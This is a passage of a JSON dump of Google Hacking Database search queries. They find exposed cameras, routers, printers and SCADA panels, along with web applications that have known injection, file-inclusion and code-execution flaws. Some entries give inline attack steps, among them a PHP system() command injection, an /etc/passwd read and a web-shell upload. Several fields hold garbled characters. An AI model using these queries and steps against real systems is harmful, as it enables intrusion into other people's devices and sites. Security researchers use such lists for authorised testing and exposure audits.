"description": "# Google Dork: intitle:\"ipMonitor - Log in\"\r\n# Various Online Devices\r\n# Date: 15/09/2021 \r\n# Exploit Author: J. Igor Melo"}, {"dork": "intitle:\"Codian MCU\" \"MCU\" \"Home Streaming Conferences\"", "description": "# Google Dork: intitle:\"Codian MCU\" \"MCU\" \"Home Streaming Conferences\"\r\n# Various Online Devices\r\n# Date: 15/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intext:\"amcrest\" \"Invalid login credentials\"", "description": "#Google Dork: intext:\"amcrest\" \"Invalid login credentials\"\r\n# Various Online Devices\r\n# Date: 25/06/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "inurl:/controlmenu.htm", "description": "# Google Dork: inurl:/controlmenu.htm\r\n# Various Online Devices\r\n# Date: 18/07/2021\r\n# Exploit Author: Marko \u017dlender"}, {"dork": "intitle:\"Pyramid Debug Toolbar\" inurl:_debug_toolbar", "description": "# Google Dork: intitle:\"Pyramid Debug Toolbar\" inurl:_debug_toolbar\r\n# Various Online Devices\r\n# Date: 31/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"CirCarLife Scada\" inurl:/html/index.html", "description": "# Google Dork: intitle:\"CirCarLife Scada\" inurl:/html/index.html\r\n# Various Online Devices\r\n# Date: 088/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"amcrest\" \"LDAP User\"", "description": "#Google Dork: intext:\"amcrest\" \"LDAP User\"\r\n# Various Online Devices\r\n# Date: 26/06/2021\r\n#Exploit Author: Neha Singh"}, {"dork": "intitle:\"Youless energy monitor\" \"Model\" \"Firmware\" \"www.youless.nl\"", "description": "# Google Dork: intitle:\"Youless energy monitor\" \"Model\" \"Firmware\" \"www.youless.nl\"\r\n# Various Online Devices\r\n# Date:17/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/cgi-bin/login.html \"qnap turbo nas\"", "description": "#Google Dork: inurl:/cgi-bin/login.html \"qnap turbo nas\"\r\n# Various Online Devices\r\n# Date: 17/05/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\"C-more -- the best HMI presented by AutomationDirect\"", "description": "# Dork: intitle:\"C-more -- the best HMI presented by AutomationDirect\""}, {"dork": "intitle:\"OS-ZuKon\" \"SSS Siedle\"", "description": "# Google Dork: intitle:\"OS-ZuKon\" \"SSS Siedle\"\r\n# Various Online Devices\r\n# Date: 10/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"EnvisionGateway\" \"scheduler\" \"control\"", "description": "# Google Dork: intitle:\"EnvisionGateway\" \"scheduler\" \"control\"\r\n# Various Online Devices\r\n# Date: 31/08/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"IPC CHIP Main Page\" \"Beck IPC GmbH\"", "description": "# Google Dork: intitle:\"IPC CHIP Main Page\" \"Beck IPC GmbH\"\r\n# Various Online Devices\r\n# Date: 19/09/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "inurl:/admin/public/asdm.jnlp \"ASDM on\"", "description": "# Google Dork: inurl:/admin/public/asdm.jnlp \"ASDM on\"\r\n# Various Online Devices\r\n# Date: 31/08/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"SPC4300\" \"ID\"", "description": "# Google Dork: intitle:\"SPC4300\" \"ID\"\r\n# Various Online Devices\r\n# Date: 06/09/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "\u00a920 \"Copyright Yamaha Corporation Visit\"", "description": "# Google Dork: \u00a920 \"Copyright Yamaha Corporation Visit\"\r\n# Various Online Devices\r\n# Date: 28/09/2021 \r\n# Exploit Author: MiningOmerta\r\n\r\n This dorks finds Yamaha Systems that can be controlled and configured remotely. Unauthenticated access to various Yamaha devices. While unauthenticated (no prompt for authentication), one has the ability to upload firmware, remotely interact with devices from the URL (http://ip.addr/index.html?zone=0&foo=1), alter network and name settings, AirPlay and wifi password disclosure, change network settings to something other than they are, dissect firmware via backup, etc. There is also disclosure of the device\u2019s internal IP address in the network settings."}, {"dork": "Fwd: intitle:\"Codian MCU - Home Page\"", "description": "# Google Dork: intitle:\"Codian MCU - Home Page\"\r\n# Various Online Devices\r\n# Date: 08/10/2021 \r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"SPC4300\" \"ID\"", "description": "# Google Dork: Fwd: intitle:\"SPC4300\" \"ID\"\r\n# Various Online Devices\r\n# Date:08/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"OS-ZuKon\" \"SSS Siedle\"", "description": "# Google Dork: Fwd: intitle:\"OS-ZuKon\" \"SSS Siedle\"\r\n# Various Online Devices\r\n# Date:09/10/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "Fwd: intitle:\"Heatmiser Wifi Thermostat\" \"username\" -.com", "description": "# Google Dork: intitle:\"Heatmiser Wifi Thermostat\" \"username\" -.com\r\n# Various Online Devices\r\n# Date: 14/10/2021 \r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\"webcamXP 5\" inurl:admin.html", "description": "# Google Dork: intitle:\"webcamXP 5\" inurl:admin.html\r\n# Various Online Devices\r\n# Date:14/10/2021\r\n# Exploit Author: C\u00e9sar Hern\u00e1ndez Obispo"}, {"dork": "intitle:\"ADSL Router\" inurl:\"/login.htm\"", "description": "# Google Dork: intitle:\"ADSL Router\" inurl:\"/login.htm\"\r\n# Various Online Devices\r\n# Date: 20/10/2021 \r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"Microseven M7CAM IP Camera\"", "description": "# Google Dork: intitle:\"Microseven M7CAM IP Camera\"\r\n# Various Online Devices\r\n# Date:26/10/2021\r\n# Exploit Author: Neha Singh"}, {"dork": "intitle:\" - General Status [none]\"", "description": "# Google Dork: intitle:\" - General Status [none]\"\r\n# Various Online Devices\r\n# Date: 04/11/2021\r\n# Exploit Author: Nisrin Ahmed"}, {"dork": "intitle:\"webcamXP\" inurl:8080", "description": "# Google Dork: intitle:\"webcamXP\" inurl:8080\r\n# Various Online Devices\r\n# Date: 08/11/2021 \r\n# Exploit Author: Krishna Agarwal"}, {"dork": "intext:\"Real-time IP Camera Monitoring System\" intext:\"ActiveX Mode (For IE Browser)\"", "description": "# Google Dork: intext:\"Real-time IP Camera Monitoring System\" intext:\"ActiveX Mode (For IE Browser)\"\r\n# Various Online Devices\r\n# Date:16/11/2021\r\n# Exploit Author: Yash Singh"}, {"dork": "intitle:\"Secure Access Service\" inurl:\"/dana-na/auth/url_default/welcome.cgi\"", "description": "# Google Dork: intitle:\"Secure Access Service\" inurl:\"/dana-na/auth/url_default/welcome.cgi\"\r\n# Various Online Devices\r\n# Date:16/11/2021\r\n# Exploit Author: Mugdha Bansode"}, {"dork": "intitle:\"MODBUS TCP RS485 Converter\" intext:\"Module Name: MMTCPBCONV\" \"powered by Atmel ARM.\"", "description": "# Google Dork: intitle:\"MODBUS TCP RS485 Converter\" intext:\"Module Name: MMTCPBCONV\" \"powered by Atmel ARM.\"\r\n# Various Online Devices\r\n# Date: 26/04/2021\r\n# Exploit Author: Mugdha Peter Bansode"}, {"dork": "intitle:\" SyncThru Web Service\" intext:\"Supplies Information\"", "description": "# Google Dork: intitle:\" SyncThru Web Service\" intext:\"Supplies Information\"\r\n# Various Online Devices\r\n# Date:14/06/2022\r\n# Exploit Author: Yash Singh"}, {"dork": "inurl:webcam site:skylinewebcams.com inurl:roma", "description": "# Google Dork: inurl:webcam site:skylinewebcams.com inurl:roma\r\n# Various Online Devices\r\n# Date:11/02/2022\r\n# Exploit Author: Simone Gasparato"}, {"dork": "inurl:/doc/page/login.asp?", "description": "# Google Dork: inurl:/doc/page/login.asp?\r\n# Various Online Devices\r\n# Date: 18/02/2022\r\n# Exploit Author: Stuart Steenberg\r\n#Description: Used to find Hikvision camera login pages."}, {"dork": "inurl:7001/console intitle:weblogic", "description": "# Google Dork: inurl:7001/console intitle:weblogic\r\n# Various Online Devices\r\n# Date: 31/05/2022\r\n# Exploit Author: Al Imran"}, {"dork": "Various Online Devices Dork", "description": "# Google Dork: inurl /view.shtml intext:\"Beach\"\r\n# Various Online Devices\r\n# Date:7/06/2022\r\n# Exploit Author: isa ghojaria"}, {"dork": "intitle:\"Roteador Wireless\" inurl:login.asp", "description": "# Google Dork: intitle:\"Roteador Wireless\" inurl:login.asp\r\n# Category: Various Online Devices\r\n# Date: 14/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"web server login\" \"please enter your login\"", "description": "# Google Dork: intitle:\"web server login\" \"please enter your login\"\r\n# Category: Various Online Devices\r\n# Date: 18/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Network Camera\" inurl:main.cgi", "description": "Google Dork: intitle:\"Network Camera\" inurl:main.cgi\r\n# Various Online Devices\r\n# Date:20/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Pi-hole-ip\" inurl:admin", "description": "# Google Dork: intitle:\"Pi-hole-ip\" inurl:admin\r\n# Various Online Devices\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"NoVus IP camera\" -com", "description": "# Google Dork: intitle:\"NoVus IP camera\" -com\r\n# Various Online Devices\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"Gargoyle Router Management Utility\" -com|net", "description": "# Google Dork: intitle:\"Gargoyle Router Management Utility\" -com|net\r\n# Various Online Devices\r\n# Date:25/07/2022\r\n# Exploit Author: s Thakur"}, {"dork": "inurl:viewer/live/index.html", "description": "# Google Dork: inurl:viewer/live/index.html\r\n# Date: 08/04/22\r\n# Category : Various Online Devices\r\n# Exploit Author: Palvinder Singh Secuneus\r\n# Version: WV-SW175"}, {"dork": "intitle:phaser inurl:/frameprop.htm", "description": "# Google Dork: intitle:phaser inurl:/frameprop.htm\r\n# Various Online Devices\r\n# Date: 22/11/2022 \r\n# Exploit Author: Bilal KU\u015e"}, {"dork": "Google Dork: HP Laserjet Config Network Page", "description": "# Google Dork:HP Laserjet Config Network Page\r\n# Various Online Devices\r\n# Date:21/02/2023\r\n# Exploit Author: Kerim Mert YILDIRIM"}, {"dork": "Google Dork: Xerox Phaser Printer Properties Page", "description": "# Google Dork: intitle:phaser inurl:/frameprop.htm\r\n# Various Online Devices\r\n# Date:22/02/2023\r\n# Exploit Author: Bilal KU\u015e"}, {"dork": "Google Dork: Brother Printers Properties Page", "description": "# Google Dork: inurl:main.html intitle:brother\r\n# Various Online Devices\r\n# Date:26/02/2023\r\n# Exploit Author: Bilal KU\u015e"}, {"dork": "inurl:\"device.rsp\" -in", "description": "# Google Dork: inurl:\"device.rsp\" -in\r\n# Various Online Devices\r\n# Date:08/03/2023\r\n# Exploit Author: Sanu Jose M"}, {"dork": "Google Dork : intitle:\"Toshiba Network Camera\"", "description": "# Google Dork: Google Dork : intitle:\"Toshiba Network Camera\"\r\n# Various Online Devices\r\n# Date:14/03/2023\r\n# Exploit Author: Shilpa Shaji"}, {"dork": "=?UTF-8?Q?intext:\"Please_respect_other_people=E2=80=99s_priva?= =?UTF-8?Q?cy_and_rights_when_using_product.\"_hikvision?=", "description": "# Google Dork: intext:\"Please respect other people\u2019s privacy and\r\nrights when using product.\" hikvision\r\n# Various Online Devices\r\n# Date:10/04/2023\r\n# Exploit Author: Zayed AlJaberi"}, {"dork": "Google Dork: Recoh Printer Properties Page", "description": "# Google Dork: intitle:Web Image Monitor inurl:mainFrame.cgi\r\n# Various Online Devices\r\n# Date:14/04/2023\r\n# Exploit Author: Hasan Ali YILDIR"}, {"dork": "Re: GHDB - Dork", "description": "# Google Dork: intitle: \"webcam\" site: \"live\"\r\n# Various Online Devices\r\n# Date:02/05/2023\r\n# Exploit Author: Ramjan Ali Sabber"}, {"dork": "allintitle:\"A8810-0\"", "description": "# Google Dork: allintitle:\"A8810-0\"\r\n# Various Online Devices\r\n# Date:31/05/2023\r\n# Exploit Author: Thomas Heverin"}, {"dork": "intitle:\"Webcam\" inurl:WebCam.htm", "description": "# Google Dork: intitle:\"Webcam\" inurl:WebCam.htm\r\n# Various Online Devices\r\n# Date: 07/11/2023\r\n# Exploit: s Thakur"}], "Advisories and Vulnerabilities": [{"dork": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "description": "Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. http://securityfocus.com/bid/11148/discussion/"}, {"dork": "intitle:\"WordPress > * > Login form\" inurl:\"wp-login.php\"", "description": "WordPress is a semantic personal publishing platform.. it suffers from a possible XSS attacks.http://www.securityfocus.com/bid/11268/info/"}, {"dork": "inurl:technote inurl:main.cgi*filename=*", "description": "http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter."}, {"dork": "intext:(\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.2\"|\"UBB.threads\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "description": "UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php"}, {"dork": "inurl:/SiteChassisManager/", "description": "Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/"}, {"dork": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "description": "Description:EZshopper is a full-featured shopping cart program. loadpage.cgi of EZshopper allows Directory Traversal http://www.securityfocus.com/bid/2109"}, {"dork": "powered.by.instaBoard.version.1.3", "description": "InstaBoard is a coldfusion forum solution. In its version 1.3 it is vulnerable to SQL Injection.Bugtraq ID 7338"}, {"dork": "+intext:\"powered by MyBulletinBoard\"", "description": "MyBB is a powerful, efficient and free forum package developed in PHP and MySQL. There is an SQL Injection Exploit available for MyBulletinBoard (MyBB)"}, {"dork": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "description": "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scriptingsoftware:author site: http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provides easy,anywhere-accessible, multi-language administration for your LDAP serverIf unpatched and vulnerable, a user can see any file on target system. A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser."}, {"dork": "inurl:chitchat.php \"choose graphic\"", "description": "rgod advises:Cyber-Cats ChitCHat 2.0 permit cross site scripting attacks, let users launch exploits from, let remote users obtain informations on target users, let insecurely delete/create files. This search does not find vulnerable versions, only generic.software:site: http://www.cyber-cats.com/php/rgodsite: http://rgod.altervista.orgmail: retrogod@aliceposta.it[/code]"}, {"dork": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "description": "Advanced Guestbook is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/product/4356/http://www.packetalarm.com/sec_notices/index.php?id=2209&delimit=1#detail"}, {"dork": "\"powered by Gallery v\" \"[slideshow]\"|\"images\" inurl:gallery", "description": "There is a script injection vuln for all versions.http://www.securityfocus.com/bid/14668"}, {"dork": "\"Powered by GTChat 0.95\"+\"User Login\"+\"Remember my login information\"", "description": "There is a (adduser) remote denial of service vulnerabilty on version 0.95"}, {"dork": "intitle:\"WEB//NEWS Personal Newsmanagement\" intext:\"\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2002-2004 by Christian Scheb - Stylemotion.de\"+\"Version 1.4 \"+\"Login\"", "description": "WEB//NEWS 1.4 is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries."}, {"dork": "\"CosmoShop by Zaunz Publishing\" inurl:\"cgi-bin/cosmoshop/lshop.cgi\" -johnny.ihackstuff.com -V8.10.106 -V8.10.100 -V.8.10.85 -V8.10.108 -V8.11*", "description": "cosmoshop is a comercial shop system written as a CGI.vulnerabilities:sql injection, passwords saved in cleartext, view any filehttp://www.securityfocus.com/archive/1/409510/30/120/threaded"}, {"dork": "\"Powered by Woltlab Burning Board\" -\"2.3.3\" -\"v2.3.3\" -\"v2.3.2\" -\"2.3.2\"", "description": "It's an exact replica of vbulletin but it is free.SQL-Injection Exploit:http://www.governmentsecurity.org/archive/t14850.html"}, {"dork": "inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "description": "Moodle"}, {"dork": "\"Powered by XOOPS 2.2.3 Final\"", "description": "XOOPS 2.2.3 Arbitrary local file inclusionThis a generic dork for the version I tested, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html"}, {"dork": "\"This website was created with phpWebThings 1.4\"", "description": "This is Secunia advisory:http://secunia.com/advisories/17410/and my exploit that show a new vulnerability in \"msg\" parameter:http://rgod.altervista.org/phpwebth14_xpl.html"}, {"dork": "\"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved\" \"Mambo is Free Software released\"", "description": "this dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit:http://rgod.altervista.org/mambo452_xpl.html"}, {"dork": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "description": "eFiction"}, {"dork": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "description": "dork: \"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board\"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" now in config.dat we have: ... $title=\"Ultimate PHP Board \"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" \"; ... in header.php we have: ... include \"./db/config.dat\"; ... so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd"}, {"dork": "\"Powered by Xaraya\" \"Copyright 2005\"", "description": "Xaraya"}, {"dork": "\"This website powered by PHPX\" -demo", "description": "this is the dork for PhpX"}, {"dork": "\"Based on DoceboLMS 2.0\"", "description": "advisory & poc exploit:http://rgod.altervista.org/docebo204_xpl.html"}, {"dork": "\"Site powered By Limbo CMS\"", "description": "this is the dork for Limbo Cms"}, {"dork": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "description": "CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398Moderator note: \"Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke\""}, {"dork": "intext:\"PhpGedView Version\" intext:\"final - index\" -inurl:demo", "description": "PHPGedView"}, {"dork": "intext:\"Powered by DEV web management system\" -dev-wms.sourceforge.net -demo", "description": "DEV cms"}, {"dork": "intitle:\"phpDocumentor web interface\"", "description": "Php Documentor < = 1.3.0 rc4 remote code xctn dork: intitle:\"phpDocumentor web interface\"advisory & poc exploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html"}, {"dork": "inurl:install.pl intitle:GTchat", "description": "Gtchat install file.You can disable the chat program or change the language without a admin username or password. You can also point the chatroom information to a different URL in theory using a crosscript to take over the the chatroom."}, {"dork": "intitle:\"4images - Image Gallery Management System\" and intext:\"Powered by 4images 1.7.1\"", "description": "Find web app: 4Images = 1.7.1This web app is vulenrable to remote code execution exploit.The url of exploit is this: http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC"}, {"dork": "\"Powered by Simplog\"", "description": "searches for simplog which has directory traversal and XSS velnerabilites in version"}, {"dork": "\"powered by sblog\" +\"version 0.7\"", "description": "please go here for a writeup on the vulnerability.HTML injection.http://www.securityfocus.com/bid/17044"}, {"dork": "\"Thank You for using WPCeasy\"", "description": "There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. http://www.securityfocus.com/archive/1/425395"}, {"dork": "\"Powered by Loudblog\"", "description": "this dork is for the LoudBlog"}, {"dork": "intitle:\"b2evo installer\" intext:\"Installer f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr Version\"", "description": "this page lets you to know some interesting info on target machine, database name, username... it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands wrote a simple dictionary attack tool fot this: http://retrogod.altervista.org/b2evo_16alpha_bf.html"}, {"dork": "\"This website engine code is copyright\" \"2005 by Clever Copy\" -inurl:demo", "description": "Clever Copy"}, {"dork": "\"powered by runcms\" -runcms.com -runcms.org", "description": "\"powered by runcms\" -runcms.com -runcms.org all versions"}, {"dork": "(\"This Dragonfly\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 installation was\" | \"Thanks for downloading Dragonfly\") -inurl:demo -inurl:cpgnuke.com", "description": "exploit and short explaination: http://retrogod.altervista.org/dragonfly9.0.6.1_incl_xpl.html"}, {"dork": "inurl:docmgr | intitle:\"DocMGR\" \"enter your Username and\"|\"und Passwort bitte\"|\"saisir votre nom\"|\"su nombre de usuario\" -ext:pdf -inurl:\"download.php", "description": "exploit and short explaination: http://retrogod.altervista.org/docmgr_0542_incl_xpl.html"}, {"dork": "(intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc", "description": "exploiting a bug in EGS Enterprise Groupware System 1.0 rc4, I found this dork: (intitle:\"Flyspray setup\"|\"powered by flyspray 0.9.7\") -flyspray.rocks.cc It is related to the installation script of FileSpray 0.9.7, now I'm going to test 0.9.8-9 by now switch to sql/ directory and search the install-0.9.7.php script explaination link: http://retrogod.altervista.org/egs_10rc4_php5_incl_xpl.htmlexploit adjusted for flyspray: http://retrogod.altervista.org/flyspray_097_php5_incl_xpl.html"}, {"dork": "intext:\"LinPHA Version\" intext:\"Have fun\"", "description": "this is for Linpha"}, {"dork": "\"powered by 4images\"", "description": "this is for 4images"}, {"dork": "intext:\"Powered by Plogger!\" -plogger.org -ihackstuff -exploit", "description": "explaination & exploit: http://retrogod.altervista.org/plogger_b21_sql_xpl.html"}, {"dork": "intext:\"powered by gcards\" -ihackstuff -exploit", "description": "this is for gcards"}, {"dork": "\"Powered by XHP CMS\" -ihackstuff -exploit -xhp.targetit.ro", "description": "tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside... after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html"}, {"dork": "\"powered by php icalendar\" -ihackstuff -exploit", "description": "this is for php iCalendar"}, {"dork": "\"powered by guestbook script\" -ihackstuff -exploit", "description": "poc exploit & explaination: http://retrogod.altervista.org/gbs_17_xpl_pl.html"}, {"dork": "\"powered by claroline\" -demo", "description": "this is for Claroline e-learning platform"}, {"dork": "\"PhpCollab . Log In\" | \"NetOffice . Log In\" | (intitle:\"index.of.\" intitle:phpcollab|netoffice inurl:phpcollab|netoffice -gentoo)", "description": "this is for PhpCollab 2.x / NetOffice 2.x sql injectionhttp://retrogod.altervista.org/phpcollab_2x-netoffice_2x_sql_xpl.html"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "description": "this is the dork for PHPMyChat"}, {"dork": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge", "description": "intext:\"2000-2001 The phpHeaven Team\" -sourceforge this is for PHPMyChat remote commands execution,advisory/poc exploits:http://retrogod.altervista.org/phpmychat_0145_xpl.htmlhttp://retrogod.altervista.org/phpmychat_015dev_xpl.html"}, {"dork": "\"2004-2005 ReloadCMS Team.\"", "description": "this is for ReloadCMS"}, {"dork": "\"powered by phplist\" | inurl:\"lists/?p=subscribe\" | inurl:\"lists/index.php?p=subscribe\" -ubbi -bugs +phplist -tincan.co.uk", "description": "this is for PHPList 2.10.2 arbitrary local inclusion, discovered by me:advisory/poc exploit: http://retrogod.altervista.org/phplist_2102_incl_xpl.html"}, {"dork": "\"You have not provided a survey identification num", "description": "sql injection:http://www.securityfocus.com/bid/16077/discussremote command execution:http://retrogod.altervista.org/phpsurveyor_0995_xpl.html"}, {"dork": "\"This script was created by Php-ZeroNet\" \"Script . Php-ZeroNet\"", "description": "Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps"}, {"dork": "intitle:\"HelpDesk\" \"If you need additional help, please email helpdesk at\"", "description": "it's another helpdesk application.my exploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps"}, {"dork": "inurl:database.php | inurl:info_db.php ext:php \"Database V2.*\" \"Burning Board *\"", "description": "this is for Woltlab Burning Board 2.x (Datenbank MOD fileid)exploit:http://seclists.org/lists/bugtraq/2006/Mar/0058.html"}, {"dork": "intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\" -milw0rm -exploit", "description": "this is for X7 Chat"}, {"dork": "allinurl:tseekdir.cgi", "description": "tseekdir.cgi?location=FILENAME%00eg:tseekdir.cgi?location=/etc/passwd%00basically any file on the server can be viewed by inserting a null (%00) into the URL.credit to duritohttp://seclists.org/bugtraq/2006/May/0184.html"}, {"dork": "\"powered by pppblog v 0.3.(.)\"", "description": "this is for the pppblog 0.3.x system disclosure vulnerability, advisory/poc exploit: http://retrogod.altervista.org/pppblog_038_xpl.html"}, {"dork": "Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS . Back to top -demo -\"deadly eyes\"", "description": "this is for Nucleus 3.22 CMS arbitrary remote inclusion advisory/poc exploit: http://retrogod.altervista.org/nucleus_322_incl_xpl.html"}, {"dork": "\"Powered by PHP-Fusion v6.00.110\" | \"Powered by PHP-Fusion v6.00.2..\" | \"Powered by PHP-Fusion v6.00.3..\" -v6.00.400 -johnny.ihackstuff", "description": "this the dork for theese PHP-Fusion exploits:http://retrogod.altervista.org/phpfusion_600306_xpl.htmlhttp://retrogod.altervista.org/phpfusion_600306_sql.html"}, {"dork": "intitle:\"XOOPS Site\" intitle:\"Just Use it!\" | \"powered by xoops (2.0)|(2.0.....)\"", "description": "this is the dork for the XOOPS 2.x 'xoopsOption[nocommon]' overwrite vulnerability, advisory & poc exploit:http://retrogod.altervista.org/xoops_20132_incl.html"}, {"dork": "\"Powered by sendcard - an advanced PHP e-card program\" -site:sendcard.org", "description": "this is for Sendcard remote commands execution,advisory/ poc exploit: http://retrogod.altervista.org/sendcard_340_xpl.html"}, {"dork": "\"powered by xmb\"", "description": "this is for XMB"}, {"dork": "\"Powered by Vsns Lemon\" intitle:\"Vsns Lemon\"", "description": "hxxp://evuln.com/vulns/106/summary.html"}, {"dork": "inurl:\"sbw2Behoerden.php\"", "description": "German.Authorities.CMS SQL Injection Vulnerability. Bug: /data/sbw2Behoerden.php?sbwtyp=\nAuthor: Bloodman"}, {"dork": "This page was produced using SAM Broadcaster. \u00c2\u00a9 Copyright Spacial Audio Solutions, LLC 1999 - 2004.", "description": "samPHPweb (db.php commonpath) Remote File Inclusion Vulnerability - CVE: 2008-0143: https://www.exploit-db.com/exploits/4834"}, {"dork": "allinurl: id \"com_jooget\"", "description": "Joomla Component jooget"}, {"dork": "inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.", "description": "Battle Blog 1.25 Auth Bypass SQL Injection / HTML Injection Vulns - CVE: 2009-3718: https://www.exploit-db.com/exploits/9183"}, {"dork": "inurl:com_img", "description": "Joomla Component (com_img) LFI Vulnerability: https://www.exploit-db.com/exploits/15470"}, {"dork": "inurl:\"toplist.php\" \"powered by phpbb\"", "description": "TopList"}, {"dork": "\"Designed and Developed by Debliteck Ltd\"", "description": "DB[CMS] Sql Injection Vulnerability: https://www.exploit-db.com/exploits/12654"}, {"dork": "intext:\"Powered By : Yamamah Version 1.00\"", "description": "Yamamah 1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13849"}, {"dork": "inurl:\"whoiscart/admin/hostinginterfaces/\"", "description": "WHOISCART Scripting Vulnerability: https://www.exploit-db.com/exploits/10812"}, {"dork": "\"Powered by nzFotolog v0.4.1 \u00c2\u00a9 2005-2006 Ricardo Amaral\"", "description": "nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability - CVE: 2008-3405: https://www.exploit-db.com/exploits/6164"}, {"dork": 